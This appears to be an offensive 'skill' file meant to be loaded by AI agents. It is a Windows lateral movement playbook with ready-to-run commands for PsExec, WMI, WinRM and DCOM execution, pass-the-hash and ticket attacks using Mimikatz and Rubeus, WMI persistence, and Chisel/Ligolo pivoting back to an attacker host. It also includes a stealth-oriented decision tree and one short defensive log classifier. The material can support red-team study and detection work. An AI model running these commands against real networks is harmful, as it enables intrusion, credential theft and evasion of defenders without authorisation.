SKILL: Windows Lateral Movement — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss execution method fingerprints, OPSEC trade-offs, and credential type requirements per method.
0. RELATED ROUTING
Before going deep, consider loading:
- windows-privilege-escalation after landing on a new host for local escalation
- windows-av-evasion when EDR blocks lateral movement tools
- active-directory-kerberos-attacks for Kerberos-based lateral (pass-the-ticket, delegation)
- active-directory-acl-abuse for ACL-based paths to new hosts
Advanced Reference
Also load CREDENTIAL_DUMPING.md when you need:
- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, credential manager, cached domain credentials
- NTDS.dit extraction methods
1. REMOTE EXECUTION METHODS COMPARISON
| Method | Port | Cred Type | Creates Service? | File on Disk? | OPSEC | Admin Required? |
|---|---|---|---|---|---|---|
| PsExec | 445 (SMB) | Password/Hash | Yes (PSEXESVC) | Yes (.exe) | Low | Yes |
| Impacket smbexec | 445 | Password/Hash | Yes (temp service) | No | Medium | Yes |
| Impacket atexec | 445 | Password/Hash | No (scheduled task) | No | Medium | Yes |
| WMI | 135+dynamic | Password/Hash | No | No | High | Yes |
| WinRM | 5985/5986 | Password/Hash/Ticket | No | No | High | Yes (Remote Mgmt) |
| DCOM | 135+dynamic | Password/Hash | No | No | High | Yes |
| RDP | 3389 | Password/Hash (RestrictedAdmin) | No | No | Low (GUI session) | RDP access |
| SSH | 22 | Password/Key | No | No | High | SSH enabled |
| SC | 445 | Password/Hash | Yes (custom service) | Yes | Low | Yes |
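The columns a defender keys on are the same ones the table uses for OPSEC: whether a service is installed, whether a binary lands on disk, and which process ends up as the parent of the spawned shell. As an added example that is not part of the original playbook, the Python below classifies constructed Windows/Sysmon event records by method; the loopback-share output redirection (`\\127.0.0.1\C$` / `ADMIN$`) that Impacket smbexec and wmiexec use, and the WmiPrvSE.exe / wsmprovhost.exe / mmc.exe parent processes, are assumed fingerprints beyond what the table itself states.

```python
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class Event:
    # event_id follows Windows/Sysmon numbering: 7045 service installed, 4698 task created, 1 process creation
    event_id: int
    fields: dict = field(default_factory=dict)

LOOPBACK_SHARE = "\\\\127.0.0.1\\"   # Impacket smbexec/wmiexec redirect command output here
# Parents that spawn a shell only when the table's "no service" methods are in use
PARENT_FINGERPRINTS = {
    "wsmprovhost.exe": "WinRM (PowerShell remoting / evil-winrm)",
    "mmc.exe": "DCOM MMC20.Application (mmc.exe parent)",
}

def classify(ev: Event) -> Optional[str]:
    """Return the likely remote-execution method, or None if nothing matches."""
    f = ev.fields
    if ev.event_id == 7045:
        if f.get("ServiceName", "").upper() == "PSEXESVC":
            return "PsExec (PSEXESVC service)"
        if LOOPBACK_SHARE in f.get("ImagePath", ""):
            return "smbexec-style temporary service (output to loopback share)"
    elif ev.event_id == 4698:
        return "atexec-style scheduled task"
    elif ev.event_id == 1:
        parent = f.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if parent == "wmiprvse.exe":
            if LOOPBACK_SHARE in f.get("CommandLine", ""):
                return "Impacket wmiexec (WmiPrvSE parent, output to loopback share)"
            return "WMI Win32_Process.Create (WmiPrvSE parent)"
        return PARENT_FINGERPRINTS.get(parent)
    return None

def scan(events) -> list:
    """Return (event_id, verdict) for every event that matches a fingerprint."""
    return [(e.event_id, v) for e in events if (v := classify(e)) is not None]

# Constructed sample events: field names follow the real logs, values are made up
SAMPLE_EVENTS = [
    Event(7045, {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}),
    Event(7045, {"ServiceName": "BTOBTO", "ImagePath":
          "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat"}),
    Event(1, {"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
              "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.1 2>&1"}),
    Event(1, {"ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "CommandLine": "whoami"}),
    Event(1, {"ParentImage": "C:\\Windows\\System32\\mmc.exe", "CommandLine": "cmd.exe /c whoami"}),
    Event(4698, {"TaskName": "\\updatetask"}),
]
```

A service install that matches neither rule returns None here; in practice every 7045 from a remote session deserves a look, since the SC row in the table is exactly that case.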
2. PSEXEC VARIANTS
Impacket PsExec
```bash
# With password
psexec.py DOMAIN/administrator:password@TARGET_IP
# With NTLM hash (pass-the-hash)
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```
Impacket smbexec (Stealthier — No Binary Upload)
```bash
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
```
Impacket atexec (Scheduled Task)
```bash
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"
```
Sysinternals PsExec
```bat
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
REM Run as SYSTEM (-s)
PsExec64.exe \\TARGET -s cmd.exe
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"
```
3. WMI LATERAL MOVEMENT
```bash
# Impacket wmiexec
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```
```powershell
# PowerShell WMI process creation
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
# WMI event subscription persistence
$filterArgs = @{
    EventNamespace = 'root\cimv2'; Name = 'Updater';
    QueryLanguage = 'WQL';
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
```
4. WINRM LATERAL MOVEMENT
```bash
# evil-winrm (from Linux — with password)
evil-winrm -i TARGET_IP -u administrator -p password
# evil-winrm (with hash)
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
# evil-winrm (with Kerberos)
evil-winrm -i target.domain.com -r DOMAIN.COM
```
```powershell
# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
# Multiple targets simultaneously
Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }
```
5. DCOM LATERAL MOVEMENT
Stealthy — uses legitimate COM objects, no service creation.
MMC20.Application
```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")
```
ShellWindows
```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)
```
ShellBrowserWindow
```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
```
Impacket dcomexec
```bash
dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20
```
6. PASS-THE-HASH (PTH)
Use NTLM hash directly without knowing the plaintext password.
```bash
# CrackMapExec — spray/check admin access
crackmapexec smb TARGETS -u administrator -H NTLM_HASH
# Impacket tools (all support -hashes)
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
# evil-winrm
evil-winrm -i TARGET -u user -H NTLM_HASH
# xfreerdp (Restricted Admin mode must be enabled)
xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN
```
```
# Mimikatz PTH (spawns new process with injected creds)
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe
```
Enable Restricted Admin for RDP PTH
```bat
REM On target (requires admin): enable restricted admin
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```
7. OVERPASS-THE-HASH (PASS-THE-KEY)
Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.
```bash
# Request TGT with hash
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
# Or with AES256 key
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP
# Use Kerberos for all subsequent tools
psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com
```
```
# Mimikatz overpass-the-hash
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
# New PowerShell session → klist shows Kerberos TGT
```
Advantage: Pure Kerberos auth avoids NTLM logging and detection.
8. PASS-THE-TICKET
```bash
# Use existing .ccache ticket
export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com
```
```
# Mimikatz — inject .kirbi ticket
kerberos::ptt ticket.kirbi
# Verify
klist
# Rubeus
Rubeus.exe ptt /ticket:base64_blob
```
9. PIVOTING THROUGH COMPROMISED HOSTS
SSH Tunnel / Port Forward
```bash
# Dynamic SOCKS proxy through compromised host
ssh -D 1080 user@COMPROMISED_HOST
# Use with proxychains
# Local port forward (access internal service)
ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST
```
Chisel (No SSH Needed)
```bash
# On attacker (server)
chisel server --reverse -p 8080
# On compromised host (client)
chisel client ATTACKER:8080 R:socks
# Creates SOCKS5 proxy on attacker's port 1080
```
Ligolo-ng (Modern, Fast)
```bash
# On attacker
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# On compromised host
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert
# In ligolo console
session # Select agent
start # Start tunnel
# Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo
```
10. LATERAL MOVEMENT DECISION TREE
```text
Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│   ├── Plaintext password → any method
│   ├── NTLM hash → PTH methods (§6)
│   │   ├── Need stealthier? → Overpass-the-Hash first (§7)
│   │   └── Direct use → psexec/wmiexec/evil-winrm with -H
│   ├── Kerberos ticket → Pass-the-Ticket (§8)
│   └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│   ├── High stealth needed
│   │   ├── WMI (no file on disk, no service) → wmiexec (§3)
│   │   ├── DCOM (uses legitimate COM) → dcomexec (§5)
│   │   └── WinRM (PowerShell remoting) → evil-winrm (§4)
│   ├── Moderate stealth
│   │   ├── smbexec (no binary upload) (§2)
│   │   └── atexec (scheduled task, auto-cleanup) (§2)
│   └── Low stealth acceptable
│       ├── PsExec (reliable, creates service) (§2)
│       └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│   ├── SSH available → SSH tunnel / SOCKS (§9)
│   ├── No SSH → Chisel or Ligolo-ng (§9)
│   └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│   ├── SMB signing required → WMI, WinRM, or DCOM
│   ├── WinRM disabled → WMI or DCOM
│   ├── Firewall blocks 135/445 → RDP or SSH
│   └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
    └── Load CREDENTIAL_DUMPING.md
```
Repository: yaklang/hack-skills